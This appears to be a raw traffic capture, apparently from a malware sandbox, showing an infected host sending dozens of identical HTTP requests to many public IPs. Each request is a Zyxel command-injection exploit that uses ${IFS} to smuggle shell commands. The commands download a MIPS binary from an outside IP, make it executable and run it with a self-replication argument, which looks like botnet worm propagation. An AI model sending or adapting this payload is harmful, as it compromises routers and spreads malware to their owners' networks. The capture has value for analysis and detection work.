                                                Jan 28, 2024 10:16:16.682200909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2297192.168.2.235531650.41.53.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682228088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2298192.168.2.234902827.41.12.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682265997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2299192.168.2.2334106209.217.181.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682306051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2300192.168.2.235289064.224.31.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682341099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2301192.168.2.2360324122.203.227.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682373047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2302192.168.2.233901288.59.150.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682404995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2303192.168.2.2341030190.28.236.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682430029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2304192.168.2.235457063.194.12.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682456970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2305192.168.2.23363304.224.134.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682498932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2306192.168.2.233896846.186.70.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682514906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2307192.168.2.2357414204.40.164.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682532072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2308192.168.2.234828034.234.194.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682560921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2309192.168.2.235552014.236.48.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682588100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2310192.168.2.2351180147.134.28.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682598114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2311192.168.2.234544094.36.114.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682630062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2312192.168.2.2334790190.173.55.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682646990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2313192.168.2.23358768.105.3.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682679892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2314192.168.2.235578445.192.144.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682707071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2315192.168.2.2352458198.109.79.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682753086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2316192.168.2.235141850.80.129.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682753086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2317192.168.2.235955895.236.119.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682775021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2318192.168.2.23334961.49.69.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682807922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2319192.168.2.2341632191.173.32.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682831049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2320192.168.2.2357628176.243.30.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682861090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2321192.168.2.23506041.157.135.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682879925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2322192.168.2.2360788204.41.168.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682910919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2323192.168.2.234202461.39.162.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682960033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2324192.168.2.2349554161.167.36.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682970047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2325192.168.2.2339368221.229.108.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683001041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2326192.168.2.2344172205.167.49.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683018923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2327192.168.2.2337312118.61.170.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683059931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2328192.168.2.235815674.215.60.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683147907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2329192.168.2.2342934200.166.149.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683192968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2330192.168.2.235347499.115.17.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683207035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2331192.168.2.234486248.123.87.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683233976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2332192.168.2.2357036104.22.159.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683268070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2333192.168.2.2353692141.85.245.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683296919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2334192.168.2.2339016220.175.116.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683312893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2335192.168.2.2339310189.169.43.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683336973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2336192.168.2.2360398115.239.181.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683365107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2337192.168.2.234839093.46.119.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683379889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2338192.168.2.2337088200.236.18.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683389902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2339192.168.2.2336436151.198.65.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683410883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2340192.168.2.2334594138.211.215.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683450937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2341192.168.2.2342388210.182.11.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683480024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2342192.168.2.2342018213.216.234.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683501959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2343192.168.2.234606631.5.169.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683532953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2344192.168.2.2344458177.158.54.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683543921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2345192.168.2.2338624121.120.202.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683578014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2346192.168.2.234051075.119.5.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.683614969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2347192.168.2.235243052.55.145.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.686269999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2348192.168.2.23597062.63.219.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.686295986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2349192.168.2.2346172104.132.24.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.686299086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2350192.168.2.2345094201.29.28.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692003965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2351192.168.2.234408068.179.33.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692029953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2352192.168.2.2345108141.146.176.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692050934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2353192.168.2.2339932182.146.190.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692120075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2354192.168.2.2352914122.122.54.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692120075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2355192.168.2.235377278.184.98.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692141056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2356192.168.2.2355816206.24.241.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692173958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2357192.168.2.235658853.184.93.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692190886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2358192.168.2.2333778205.114.105.78443
                                                TimestampBytes transferredDirectionData
